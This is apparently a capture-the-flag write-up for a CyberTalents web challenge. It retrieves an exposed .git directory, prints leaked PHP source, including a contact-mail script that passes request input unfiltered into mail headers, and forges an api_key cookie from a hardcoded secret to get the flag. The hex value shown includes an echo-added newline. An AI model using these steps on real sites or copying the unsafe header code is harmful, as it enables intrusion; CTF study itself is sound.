---
layout: post
title: "COMRADE III - CyberTalents (web)"
date: 2025-09-27
categories: [Web]
---

# COMRADE III
```
description: Hey Comrade , World War III will begin soon , we need to reveal what was hidden
```


site = http://wcamxwl32pue3e6mk873o1muw3y0qyz8l9o8u93w-web.cybertalentslabs.com/

get the .git, then found 

```php
<?php
include('./access.php');
include('./index.php');
if($_COOKIE['api_key'] == $apikey) 
echo "Flag: $flag";
```
and yeah a cookie 

```php 
<?php

    $to = "comrade1995@gmail.com";
    $from = $_REQUEST['email'];
    $name = $_REQUEST['name'];
    $subject = $_REQUEST['subject'];
    $number = $_REQUEST['number'];
    $cmessage = $_REQUEST['message'];

    $headers = "From: $from";
	$headers = "From: " . $from . "\r\n";
	$headers .= "Reply-To: ". $from . "\r\n";
	$headers .= "MIME-Version: 1.0\r\n";
	$headers .= "Content-Type: text/html; charset=ISO-8859-1\r\n";

    $subject = "You have a message from your Bitmap Photography.";

    $logo = 'img/logo.png';
    $link = '#';
	$access = bin2hex('this_is_top_secret');
	$body = "<!DOCTYPE html><html lang='en'><head><meta charset='UTF-8'><title>Express Mail</title></head><body>";
	$body .= "<table style='width: 100%;'>";
	$body .= "<thead style='text-align: center;'><tr><td style='border:none;' colspan='2'>";
	$body .= "<a href='{$link}'><img src='{$logo}' alt=''></a><br><br>";
	$body .= "</td></tr></thead><tbody><tr>";
	$body .= "<td style='border:none;'><strong>Name:</strong> {$name}</td>";
	$body .= "<td style='border:none;'><strong>Email:</strong> {$from}</td>";
	$body .= "</tr>";
	$body .= "<tr><td style='border:none;'><strong>Subject:</strong> {$csubject}</td></tr>";
	$body .= "<tr><td></td></tr>";
	$body .= "<tr><td colspan='2' style='border:none;'>{$cmessage}</td></tr>";
	$body .= "</tbody></table>";
	$body .= "</body></html>";

    $send = mail($to, $subject, $body, $headers)

```

this $access = bin2hex('this_is_top_secret'); 
```bash
echo "this_is_top_secret" | xxd --plain
746869735f69735f746f705f7365637265740a
```

use the out 746869735f69735f746f705f7365637265740a as ``cookie api_key value`` 
and reload the page site exploited.
```php
Flag{g!7_!5_4w350m3_XD!!}
```

